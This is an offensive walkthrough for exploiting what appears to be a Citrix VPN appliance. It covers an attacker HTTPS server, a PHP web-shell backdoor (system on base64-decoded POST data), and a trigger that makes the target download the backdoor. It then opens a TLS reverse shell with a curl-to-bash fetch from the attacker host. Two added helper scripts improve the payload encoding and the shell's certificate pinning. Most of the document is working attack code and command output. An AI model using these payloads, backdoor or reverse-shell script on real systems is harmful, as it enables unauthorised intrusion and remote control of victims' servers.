Creating a Python HTTPS server
| # Static-file HTTPS server on port 4443 (ssl.wrap_socket() was removed in Python 3.12, so an SSLContext is used instead)
from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl
httpd = HTTPServer(('0.0.0.0', 4443), SimpleHTTPRequestHandler)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(certfile='./cert_serv.pem')  # private key and certificate in the same PEM file
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
|
Creating the TLS certificate (the key and the certificate are written to the same PEM file):
| openssl req -new -x509 -keyout cert_serv.pem -out cert_serv.pem -days 365 -nodes
|
Usage:
Backdoor code
File "back.php" (runs the base64-decoded value of the POST parameter x):
| <?php system(base64_decode($_POST['x'])); ?>
|
Testing the backdoor locally in a php:alpine container:
| (host) -> docker run -v ${PWD}:/opt/src --rm -ti php:alpine /bin/ash
(docker) -> # ip a s eth0
23: eth0@if24: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:11:00:04 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.4/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever
(docker) -> # cd opt/src
/opt/src # php -S 0.0.0.0:1337
[Fri Feb 21 11:37:57 2020] PHP 7.4.2 Development Server (http://0.0.0.0:1337) started
|
Sending the command with curl (the command is base64-encoded into the x parameter):
| (host) -> curl -k http://172.17.0.4:1337/back.php -d "x=`echo 'id' | base64`"
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
|
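One caveat with the `curl -d "x=$(echo ... | base64)"` one-liner used here and for the later triggers: `-d` sends the body verbatim, and PHP turns a literal `+` in a form body into a space when it builds `$_POST`, so any command whose base64 contains `+` reaches `base64_decode()` corrupted (`id` encodes to `aWQK` and is fine; `id>/tmp/out` encodes to `aWQ+...` and is not). The following is an added example, not part of the original write-up: it builds the token the page's back.php expects, emulates PHP's form parsing with sed, and contrasts the raw `-d` body with a percent-encoded one. The function names and the sample commands are constructed for the demo; it assumes a POSIX sh with `base64`, `tr` and `sed`.

```shell
#!/bin/sh
# Added example (not from the original write-up): why "+" in a base64 token breaks the
# plain `curl -d` trigger against back.php, and what the fixed body looks like.
# Assumes POSIX sh with base64, tr and sed. All commands below are constructed inputs.
set -u

b64_token() {  # b64_token <cmd>: the value back.php expects in x (single line, no newline)
    printf '%s' "$1" | base64 | tr -d '\n'
}

raw_body() {   # raw_body <cmd>: what `curl -d "x=$(... | base64)"` puts on the wire
    printf 'x=%s' "$(b64_token "$1")"
}

urlencoded_body() {  # urlencoded_body <cmd>: what `curl --data-urlencode "x=..."` sends
    printf 'x=%s' "$(b64_token "$1" | sed -e 's/+/%2B/g' -e 's|/|%2F|g' -e 's/=/%3D/g')"
}

php_post_x() { # php_post_x <body>: emulate how PHP derives $_POST['x'] from a form body:
               # a literal "+" becomes a space, then %XX sequences are decoded
    printf '%s' "${1#x=}" | sed -e 's/+/ /g' -e 's/%2B/+/g' -e 's|%2F|/|g' -e 's/%3D/=/g'
}

check() {  # check <cmd>: print what PHP sees for each body; exit 0 only if the raw body survives
    tok=$(b64_token "$1")
    printf 'command:        %s\n' "$1"
    printf 'token:          %s\n' "$tok"
    printf 'seen via -d:    %s\n' "$(php_post_x "$(raw_body "$1")")"
    printf 'seen urlencoded: %s\n' "$(php_post_x "$(urlencoded_body "$1")")"
    [ "$(php_post_x "$(raw_body "$1")")" = "$tok" ]
}

check 'id' || echo 'raw -d body corrupted the token'
check 'id>/tmp/out' || echo 'raw -d body corrupted the token'
```

On the real target the fix is to let curl do the encoding: `curl -k https://192.168.55.123/vpn/themes/back.php --data-urlencode "x=$(printf '%s' 'id>/tmp/out' | base64 | tr -d '\n')"`. Using `printf '%s'` instead of `echo` also drops the trailing newline that `echo` adds to the command (harmless for `system()`, but it is why the page's token for `id` ends in `K`).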
Exploiting the RCE and uploading the backdoor
Start the Python HTTPS server in the directory containing back.php, then use mpgn's tool to make the target fetch it (the target runs the curl command itself and writes the backdoor under /var/vpn/themes/):
| (host) -> command > curl -k https://192.168.55.1:4443/back.php -o /var/vpn/themes/back.php
[+] Adding bookmark 7QDFBBVO4SZ9.xml
[+] Bookmark added
[+] Result of the command:
|
Triggering the backdoor:
| (host) -> curl -k https://192.168.55.123/vpn/themes/back.php -d "x=$(echo 'id' | base64)"
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
|
OpenSSL reverse shell
Check whether openssl is installed on the target:
| (host) -> curl -k https://192.168.55.123/vpn/themes/back.php -d "x=$(echo 'which openssl' | base64)"
/usr/bin/openssl
|
Generating a key pair (self-signed certificate) for the reverse shell:
| openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout priv.key -out cert.crt
|
Copy the certificate into the HTTPS server's directory (the target downloads it to pin the listener):
| cp cert.crt PATH/TO/https
|
Opening the openssl listener:
| openssl s_server -quiet -key priv.key -cert ../https/cert.crt -port 8443
|
Script to trigger the openssl reverse shell (served as revopenssl.sh from the HTTPS server directory):
| #!/bin/sh
IP_ATTACKER="192.168.55.1"
REMOTE_CRT_PATH="/var/vpn/themes/cert.crt"
OPENSSL_PATH=$(which openssl)
# Fetch the listener's certificate so the client can pin it (-CAfile) instead of trusting any server
curl -k https://${IP_ATTACKER}:4443/cert.crt -o ${REMOTE_CRT_PATH}
# The named pipe feeds s_client's output back into the shell's stdin; -verify_return_error aborts the handshake on a certificate mismatch
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ${OPENSSL_PATH} s_client -quiet -CAfile ${REMOTE_CRT_PATH} -verify_return_error -verify 1 -connect ${IP_ATTACKER}:8443 > /tmp/s; rm /tmp/s
|
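The `-CAfile ... -verify_return_error -verify 1` part of the script is what stops the shell from being handed to whoever answers on 192.168.55.1:8443: without `-verify_return_error`, `s_client` only prints a verification warning and completes the handshake anyway. The following is an added example, not part of the original write-up, that shows this end to end on localhost: it generates two self-signed certificates with the same `openssl req` recipe as above, starts `s_server -quiet` with the first, and connects a client pinned to each one. It assumes the openssl CLI and a free TCP port on 127.0.0.1 (`PORT`, default 18443); the function names and certificate names are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original write-up): what the -CAfile/-verify_return_error
# pinning in the reverse-shell script buys. Two self-signed certs are generated in a temp dir,
# a listener runs with "listener.crt", and a client pinned to each cert is tried in turn.
# Assumes the openssl CLI and a free TCP port on 127.0.0.1 (PORT, default 18443).
set -u
WORK=$(mktemp -d)
PORT=${PORT:-18443}
LISTENER_PID=

gen_cert() {  # gen_cert <name>: self-signed certificate + key, same recipe as the write-up
    openssl req -x509 -nodes -days 1 -newkey rsa:2048 -subj "/CN=$1" \
        -keyout "$WORK/$1.key" -out "$WORK/$1.crt" >/dev/null 2>&1
}

start_listener() {  # start_listener <name>: s_server in the background, as the attacker runs it
    openssl s_server -quiet -key "$WORK/$1.key" -cert "$WORK/$1.crt" -port "$PORT" \
        >"$WORK/listener.out" 2>/dev/null &
    LISTENER_PID=$!
    sleep 2  # give s_server time to bind
}

# connect_pinned <name>: exit 0 only if the handshake verifies against <name>.crt.
# stdin is /dev/null so s_client exits right after the handshake (-quiet would imply
# -ign_eof and keep the connection open, which is what the reverse shell wants but not a test).
connect_pinned() {
    openssl s_client -CAfile "$WORK/$1.crt" -verify_return_error -verify 1 \
        -connect "127.0.0.1:$PORT" </dev/null >/dev/null 2>&1
}

# connect_unpinned <name>: same without -verify_return_error; a verification failure is
# only reported, the handshake still completes and s_client exits 0.
connect_unpinned() {
    openssl s_client -CAfile "$WORK/$1.crt" -verify 1 \
        -connect "127.0.0.1:$PORT" </dev/null >/dev/null 2>&1
}

cleanup() {
    [ -n "$LISTENER_PID" ] && kill "$LISTENER_PID" 2>/dev/null || true
    rm -rf "$WORK"
}

# pinning_demo: returns 0 when pinning behaves as expected (genuine listener accepted,
# impostor rejected, impostor accepted once the pin is dropped) and prints each outcome.
pinning_demo() {
    gen_cert listener && gen_cert impostor || { cleanup; return 2; }
    start_listener listener
    ok=0
    if connect_pinned listener; then echo "pinned to listener.crt: connected"; else echo "pinned to listener.crt: FAILED"; ok=1; fi
    if connect_pinned impostor; then echo "pinned to impostor.crt: CONNECTED (bad)"; ok=1; else echo "pinned to impostor.crt: rejected"; fi
    if connect_unpinned impostor; then echo "no -verify_return_error: connected despite the wrong cert"; else echo "no -verify_return_error: failed"; ok=1; fi
    cleanup
    return $ok
}

# Run the demo when the file is executed directly as pinning_demo.sh
[ "${0##*/}" = "pinning_demo.sh" ] && pinning_demo
```

The same asymmetry applies on the appliance: an operator who re-uses the script with a different listener, or a defender who answers on 8443 with their own certificate, gets a TLS alert instead of a shell, because the only trust anchor the client has is the cert.crt that revopenssl.sh just downloaded.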
Triggering the TLS reverse shell:
| (host) -> curl -k https://192.168.55.123/vpn/themes/back.php -d "x=$(echo 'curl -k https://192.168.55.1:4443/revopenssl.sh | bash' | base64)"
|
In the terminal with the waiting openssl listener:
| (host) -> openssl s_server -quiet -key priv.key -cert ../https/cert.crt -port 8443
sh: can't access tty; job control turned off
(citrix) -> $ id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
|